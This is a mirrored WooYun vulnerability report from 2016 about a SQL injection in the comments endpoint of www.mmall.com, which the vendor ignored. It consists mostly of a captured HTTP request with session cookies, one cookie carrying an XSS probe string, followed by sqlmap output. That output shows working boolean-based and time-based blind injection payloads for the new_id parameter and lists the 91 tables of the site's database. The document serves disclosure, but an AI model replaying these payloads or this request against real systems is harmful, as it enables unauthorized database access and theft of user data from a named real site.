乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-18: 细节已通知厂商并且等待厂商处理中 2016-01-23: 厂商已经主动忽略漏洞,细节向公众公开
POST /zhuangxiu/article-23186.html?act=getcomments&con=news HTTP/1.1Content-Length: 148Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.mmall.comCookie: BIGipServerwww_proxy_pool=2298609674.37151.0000; SESSION_ID=082eDHdx3IuAtLw42g%2B9dmN%2Fk8PISjX%2BIygXvlL24PvsLntcptBkjxeIRo8wBgAuZtwd%2BeQqPh7k0FaISQ; BIGipServerzhuangxiu_pool=2080505866.20480.0000; BIGipServeractivity_pool=1694564362.20480.0000; citys_province=730flRSN%2BsxZyTg18J9o6NlW3WhNqq%2FlzST3YBtgnw; citys_city=d00aq5W0gIXcIS96QbtMwxHRg2nCtibWv%2FeUe3PnGuEHLUAW0V%2FPFHJv; company_key=d87dMtcJdmryMzwPH58qAM8XKoECw%2Fhsjip%2BO560JQ; search_uuid=a350ikRg5IgC3xagG3g9NFFaGqylPrdCxlvhK0r8t1yKnUMCcBjozS2PYrW2OBRjVwvOX%2Bd%2B2wCoMo%2FIIbZhTBq10w; mmallcityid=c680daH5X%2Baf55RAIyUCuPeutkWNJkUgOC2i%2FWgp; session_word=1eddnvFPhGzc5fE9jrMcqUyyaWQDyQKENBlYwRhqIKM%2B; PHPSESSID=70e0elfqhfdqeuiejuhrnfc784; referer_domain=www.acunetix-referrer.com; OZ_1U_1727=vid=v69b6f1fa7a5f3.0&ctime=1453033501<ime=1453033419; OZ_1Y_1727=erefer=http%3A//www.acunetix-referrer.com/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29&eurl=http%3A//www.mmall.com/zhuangxiu/journal.html&etime=1453033501&ctime=1453033419<ime=1453033328&compid=1727; obj=; mask=; items=; show=; OZ_0a_1727=__AD_DT-1*1453028381*http%3A//www.mmall.com/goods-3983.html*http%3A//www.mmall.com/activity/201601pandian.html&__AD_DT-1*1453028615*http%3A//www.mmall.com/goods-35629.html*http%3A//www.mmall.com/activity/201601pandian.html&__AD_DT-1*1453028851*http%3A//www.mmall.com/goods-48678.html*http%3A//www.mmall.com/activity/201601pandian.html&__AD_DT-1*1453032970*http%3A//www.mmall.com/zhuangxiu/tu/list-1122.html*http%3A//www.mmall.com/activity/201601pandian.html&__AD_DT-1*1453033391*http%3A//www.mmall.com/zhuangxiu/tu/list-1074.html%3Fimg_id%3D18206*http%3A//www.mmall.com/activity/201601pandian.html; function 404=function 404; undefined=undefined; HMACCOUNT=D08EA30393110F77; _gscu_917286130=53027685yzkw4y93; _gscs_917286130=53027685k8rhxa93|pv:1; _gscbrs_917286130=1; Hm_lvt_96e2e95eba41bc1ff5d5ebd2e03566c5=1453027655,1453027686,1453027778,1453028004; Hm_lpvt_96e2e95eba41bc1ff5d5ebd2e03566c5=1453028004; Hm_lvt_0bead37082ff97315d9a4fac8c4fa344=1453027777,1453028004,1453032788,1453034544; Hm_lpvt_0bead37082ff97315d9a4fac8c4fa344=1453034544; CNZZDATA1256749325=1805230194-1453026322-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1453026322; bdshare_firstime=1453028470945; Hm_lvt_ffbfb19e2a0ddb32c980773d2e851554=1453027842,1453027964,1453028164,1453028490; Hm_lpvt_ffbfb19e2a0ddb32c980773d2e851554=1453028490; v="2016011719170400058512700142934871|clipboard:email:bsharesync"; opxPID=2016011719170400058512700142934871; u=1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|1453029424585|; JSESSIONID=9D4CFC0079851412A21A6F4989B64ED4.server99Host: www.mmall.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*new_id=23186&page=2
sqlmap resumed the following injection point(s) from stored session:---Parameter: new_id (POST) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: new_id=(SELECT (CASE WHEN (7054=7054) THEN 7054 ELSE 7054*(SELECT 7054 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&page=2 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: new_id=23186 AND (SELECT * FROM (SELECT(SLEEP(5)))WYcA)&page=2---back-end DBMS: MySQL >= 5.0.0Database: mmall_info_new[91 tables]+----------------------------------------+| mall_assets || mall_associations || mall_banner_clients || mall_banner_tracks || mall_banners || mall_categories || mall_comment || mall_contact_details || mall_content || mall_content_frontpage || mall_content_keyword || mall_content_rating || mall_core_log_searches || mall_extensions || mall_finder_filters || mall_finder_links || mall_finder_links_terms0 || mall_finder_links_terms1 || mall_finder_links_terms2 || mall_finder_links_terms3 || mall_finder_links_terms4 || mall_finder_links_terms5 || mall_finder_links_terms6 || mall_finder_links_terms7 || mall_finder_links_terms8 || mall_finder_links_terms9 || mall_finder_links_termsa || mall_finder_links_termsb || mall_finder_links_termsc || mall_finder_links_termsd || mall_finder_links_termse || mall_finder_links_termsf || mall_finder_taxonomy || mall_finder_taxonomy_map || mall_finder_terms || mall_finder_terms_common || mall_finder_tokens || mall_finder_tokens_aggregate || mall_finder_types || mall_gather || mall_gather_img || mall_keyword || mall_keyword_cat || mall_keyword_tdk || mall_languages || mall_menu || mall_menu_types || mall_messages || mall_messages_cfg || mall_modules || mall_modules_menu || mall_newsfeeds || mall_overrider || mall_phocagallery || mall_phocagallery_categories || mall_phocagallery_comments || mall_phocagallery_designers || mall_phocagallery_fb_users || mall_phocagallery_homes || mall_phocagallery_img_comments || mall_phocagallery_img_votes || mall_phocagallery_img_votes_statistics || mall_phocagallery_products || mall_phocagallery_tags || mall_phocagallery_tags_articles_ref || mall_phocagallery_tags_articles_view || mall_phocagallery_tags_img_view || mall_phocagallery_tags_products_ref || mall_phocagallery_tags_products_view || mall_phocagallery_tags_ref || mall_phocagallery_tags_upload_img_view || mall_phocagallery_upload || mall_phocagallery_upload_tags_ref || mall_phocagallery_user || mall_phocagallery_votes || mall_phocagallery_votes_statistics || mall_redirect_links || mall_schemas || mall_session || mall_template_styles || mall_update_categories || mall_update_sites || mall_update_sites_extensions || mall_updates || mall_user_notes || mall_user_profiles || mall_user_usergroup_map || mall_usergroups || mall_users || mall_viewlevels || mall_weblinks |+----------------------------------------+
危害等级:无影响厂商忽略
忽略时间:2016-01-23 10:20
漏洞Rank:4 (WooYun评价)
暂无